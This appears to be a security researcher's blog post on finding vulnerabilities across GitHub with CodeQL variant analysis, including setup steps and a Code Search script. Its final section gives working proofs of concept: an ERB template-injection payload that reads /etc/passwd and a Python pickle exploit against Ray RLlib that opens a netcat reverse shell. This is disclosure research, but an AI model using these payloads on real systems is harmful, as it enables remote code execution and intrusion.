Finding Vulnerabilities with MRVA CodeQL

[*] INDEX:

  1. What is MRVA?
  2. MRVA vs CodeQL suites
  3. How to set up MRVA
  4. Code Search tools
  5. Fishing with MRVA 🎣

1- What is MRVA?

Everyone knows the power of CodeQL for analyzing a repository with a single click, but MRVA gives security researchers a new way to perform security research across GitHub.

Using MRVA (multi-repository variant analysis), researchers can run a query against the top 1000 GitHub repositories at once, which significantly improves their ability to uncover potential security issues across a broad spectrum of projects.

This gets even more interesting when combined with other tools such as GitHub Code Search to obtain a more specific list of repositories to analyze (e.g. if we’re running a Ruby SSTI query, we’ll only be interested in repositories that use ERB or Slim), or when running a query that we have developed ourselves: being the first to run that query raises the chances of finding something interesting.

2- MRVA vs CodeQL suites

So what’s the difference between MRVA and CodeQL suites?

MRVA is a CodeQL feature that runs against a large number of repositories, so the better question is when to use CodeQL on a single repository and when to use MRVA on up to 1000. If you are interested in finding vulnerabilities in one specific repository, CodeQL suites are the ideal solution. A suite lets us run a list of queries covering different vulnerability classes, which gives us a much better chance of finding something in that repository.

[Figure: CodeQL]

But if CodeQL suites give us better vulnerability coverage, what’s the point of using MRVA? MRVA lets you run a single query against many repositories, so you can hunt for one type of vulnerability across many projects, which CodeQL suites cannot do. This is particularly useful for anyone developing custom queries, since it saves a lot of time.

[Figure: MRVA]

3- How to set up MRVA

3.1 - Download CodeQL extension in VSCode

First of all, we have to install the CodeQL extension for Visual Studio Code, version 1.8.0 or later.

3.2 - Configure our GitHub controller

Now we go to GitHub and create a repository named controller (any name works), remembering to make at least one commit. We do this because MRVA uses GitHub Actions to run CodeQL queries against databases that are already created and stored on GitHub (imagine having to create a thousand databases for a thousand projects: it would take forever, and GitHub already does the work for us 😎).
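
The controller repository can also be created through the GitHub REST API instead of the web UI. The following is only a sketch, assuming a personal access token that is allowed to create repositories; the function names are made up for illustration. Setting auto_init asks GitHub to create the repository with an initial README commit, which covers the "at least one commit" requirement.

```python
import json
import urllib.request

API_URL = "https://api.github.com/user/repos"

def build_create_repo_request(token, name="controller"):
    """Build (without sending) the request that creates the controller repo."""
    # auto_init makes GitHub add an initial commit containing a README.
    payload = {"name": name, "auto_init": True}
    return urllib.request.Request(
        API_URL,
        data=json.dumps(payload).encode("utf-8"),
        headers={
            "Accept": "application/vnd.github+json",
            "Authorization": f"Bearer {token}",
            "X-GitHub-Api-Version": "2022-11-28",
        },
        method="POST",
    )

def create_controller_repo(token, name="controller"):
    """Send the request and return the new repository's owner/name."""
    with urllib.request.urlopen(build_create_repo_request(token, name)) as resp:
        return json.load(resp)["full_name"]
```

Calling create_controller_repo("<your token>") should return something like your_username/controller, which is the value the extension setting expects.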

Once the controller is ready, we have to edit the settings.json of our CodeQL extension.

Then add the following line for the MRVA controller repository (replace your_username with your GitHub username):

"codeQL.variantAnalysis.controllerRepo": "your_username/controller",

Now we’re ready to run it 😎.

4- Code Search tools

We can use GitHub Code Search to find code snippets of interest. The interesting part here is creating a custom list of repositories that use the methods we are scanning for. This approach goes beyond merely analyzing the top 1000 repositories and lets us focus on the specific projects that are relevant to our research.
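
As a small illustration of what such a search could look like, the sketch below composes a query string from a code snippet plus a language: qualifier and URL-encodes it. The helper name and the "render inline" snippet are only examples chosen to match the Ruby SSTI case, not something the tooling requires.

```python
import urllib.parse

def build_code_search_query(snippet, language=None):
    """Compose a Code Search query: an exact phrase plus an optional qualifier."""
    parts = [f'"{snippet}"']
    if language:
        parts.append(f"language:{language}")
    return " ".join(parts)

# Example: Ruby files that call `render inline`.
query = build_code_search_query("render inline", language="ruby")
encoded = urllib.parse.quote(query)  # form that goes into the q= URL parameter
```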

Luckily, the GitHub API now supports Code Search (previously it only supported the legacy code search), so we can take advantage of that and build a tool. This is the script I used, which is also available in its own repository:

import argparse
import requests

# Personal access token; the Code Search endpoint requires authentication.
token = ""

headers = {
    "Accept": "application/vnd.github+json",
    "Authorization": f"Bearer {token}",
    "X-GitHub-Api-Version": "2022-11-28"
}

def request_api(query):
    """Return the unique repositories (owner/name) whose code matches the query."""
    results = set()
    page = 1
    while True:
        # Passing params lets requests URL-encode the query for us.
        params = {"q": query, "per_page": 100, "page": page}
        r = requests.get("https://api.github.com/search/code", headers=headers, params=params)
        if r.status_code != 200:
            # Rate limit or result cap reached: keep what we have so far.
            break
        # Parse the JSON instead of matching "full_name" with a regex.
        items = r.json().get("items", [])
        results.update(item["repository"]["full_name"] for item in items)
        page += 1
        # A page with fewer than 100 items is the last one.
        if len(items) != 100:
            break
    return sorted(results)


def output(filename, content):
    # Write the list in Python list syntax, e.g. ['owner/repo', ...].
    with open(filename, "w") as f:
        f.write(str(content))

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-q', '--query', help='Code Search query', required=True)
    parser.add_argument('-f', '--filename', help='Output file', required=True)

    args = parser.parse_args()

    results = request_api(args.query)
    output(args.filename, results)

Remember to add your GitHub token to make it work. This tool creates a custom list of all the repositories that use the code we specify in the query argument.
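
To feed such a list to MRVA, it has to end up in the extension's repository lists. As far as I know the CodeQL extension keeps them in a databases.json file; the layout below is my assumption of that format and should be checked against the file the extension generates. The helper name and the list name are illustrative.

```python
import json

def build_repository_list(name, repositories):
    """Return a databases.json-style structure holding one named repo list."""
    return {
        "version": 1,
        "databases": {
            "variantAnalysis": {
                # Assumed schema: each list has a name and owner/repo entries.
                "repositoryLists": [
                    {"name": name, "repositories": sorted(set(repositories))}
                ],
                "owners": [],
                "repositories": [],
            }
        },
    }

config = build_repository_list("ssti", ["b/b", "a/a", "a/a"])
config_text = json.dumps(config, indent=2)  # text to review before saving
```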

That said, the Code Search feature has been available in Visual Studio Code since June 23 (GitHub Blog). The configuration is very simple: we just go to the CodeQL extension and create a list (I called it test).

We can even specify the language used:

And finally we specify our Code Search query. In my case I used maikypedia, so every repository in which the word maikypedia appears will be included in the list.

5- Fishing with MRVA 🎣

5.1- Server Side Template Injection (Ruby)

Let’s move on to the fun part. I have written a query for Server Side Template Injection in Ruby covering ERB and Slim, so let’s try our luck with MRVA!

As with any static analysis tool, we have to account for false positives, whose number depends on the quality of the query. In this case we got 4 results from the top 1000 GitHub repositories. After discarding the false positives we are left with one repository: bootstrap-ruby/bootstrap_form.

Let’s set up the server and check if it is really vulnerable:

bootstrap_form/demo/bin ❯ sudo ./rails s 

Now we should have our Rails application running on port 3000, but let’s check the code first:

  def fragment
    @erb = params[:erb]

    @erb.prepend '<div class="p-3 border">'
    @erb << "</div>"
    load_models
    render inline: @erb, layout: "application" # rubocop: disable Rails/RenderInline
  end

This action takes a parameter named erb from the params hash (an HTTP GET parameter) and assigns its value to the instance variable @erb. Some HTML is then prepended and appended to it, and the result is finally rendered with render inline:, which behaves like ERB.new(@erb).result.

This action is called when a user visits /fragment, as specified in routes.rb:

Dummy::Application.routes.draw do
  get "fragment" => "bootstrap#fragment", as: :fragment
  resources :users

  root to: "bootstrap#form"
end

So let’s jump to the browser! We can use the following payload to read /etc/passwd and prove the SSTI (don’t forget to URL-encode it):

<%= IO.popen('cat /etc/passwd').readlines()  %>
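
The URL-encoding step can be sketched in Python. To keep the example harmless it uses the arithmetic probe <%= 7 * 7 %> instead of the payload above; the port, the /fragment route and the erb parameter come from the demo application, while the helper name is made up for illustration. If the template is evaluated, the rendered page should contain 49.

```python
import urllib.parse

BASE_URL = "http://localhost:3000/fragment"

def build_probe_url(template, base_url=BASE_URL):
    """Return the URL that passes an ERB template in the erb GET parameter."""
    # safe="" percent-encodes every reserved character, including "/" and "%".
    return f"{base_url}?erb={urllib.parse.quote(template, safe='')}"

probe_url = build_probe_url("<%= 7 * 7 %>")
```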

Nice 😎. But unfortunately, as the file path says, this is a demo application with no real security implications, so even though it is “vulnerable” at the code level, it has no impact.

5.2- Unsafe Deserialization (Python)

I found this while modeling unsafe deserialization sinks for Python, including pandas.read_pickle and others. To my surprise, while running MRVA and waiting for results from my new sinks, I found this:

It was a result from a sink in the original query, and judging by the code snippet it looked like it could be a true positive (TP). The repository is ray-project/ray.

The vulnerability resides in RLlib’s PolicyServerInput class (/ray/python/ray/rllib/env/policy_server_input.py). Specifically, on line 266, the HTTP POST handler in use deserializes user data using pickle. Using pickle for deserializing data from untrusted sources can be dangerous, as it allows the execution of arbitrary code during the deserialization process.

def do_POST(self):
    content_len = int(self.headers.get("Content-Length"), 0)
    raw_body = self.rfile.read(content_len)
    parsed_input = pickle.loads(raw_body)
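
Why pickle.loads is a dangerous sink can be shown with a harmless, self-contained sketch. An object's __reduce__ method may return any callable plus its arguments, and pickle calls it while loading. Here the callable is the builtin len, chosen only to keep the demonstration benign; the class name is made up for illustration.

```python
import pickle

class CallsLenOnLoad:
    """Unpickling this object calls len("abc") instead of rebuilding it."""
    def __reduce__(self):
        # (callable, args): pickle stores both and runs callable(*args) on load.
        return (len, ("abc",))

blob = pickle.dumps(CallsLenOnLoad())
result = pickle.loads(blob)  # executes len("abc") during deserialization
```

The value that comes back is whatever the callable returned, not an instance of the class, which shows that the sender of the bytes decides what runs on the receiver.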

The vulnerable class is used in examples such as /ray/rllib/examples/serving/cartpole_server.py (l.101-115):

if __name__ == "__main__":
    args = parser.parse_args()
    ray.init()
    def _input(ioctx):
        if ioctx.worker_index > 0 or ioctx.worker.num_workers == 0:
            return PolicyServerInput(
                ioctx,
                SERVER_ADDRESS,
                args.port + ioctx.worker_index - (1 if ioctx.worker_index > 0 else 0),
            )

Now it’s time for the PoC 😁. Run the example server:

python3 /ray/rllib/examples/serving/cartpole_server.py

And then, send the malicious data to the policy server port:

import requests
import pickle
import os
attacker = "localhost"
attacker_port = "4444"

class RCE:
    def __reduce__(self):
        cmd = (f'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc {attacker} {attacker_port} > /tmp/f')
        return os.system, (cmd,)
# Serialize the malicious class
pickled = pickle.dumps(RCE())
# Define the URL to which you want to send the POST request
url = "http://localhost:9900/"
headers = {
    "Content-Type": "application/octet-stream",  # Indicate that we are sending binary data
}
# Send the POST request with the serialized data
requests.post(url, data=pickled, headers=headers)

And as a final step, we run the exploit:

python3 exploit.py

Once again, we find ourselves at the gates. Still, MRVA has shown great potential for finding vulnerable code. This vulnerability was reported to the Ray project, and they stated that this code should only be exposed to trusted parties. Therefore, there hasn’t been a fix, but rather a comment that makes the warning more explicit in this commit.

THANKS FOR READING 😊 !!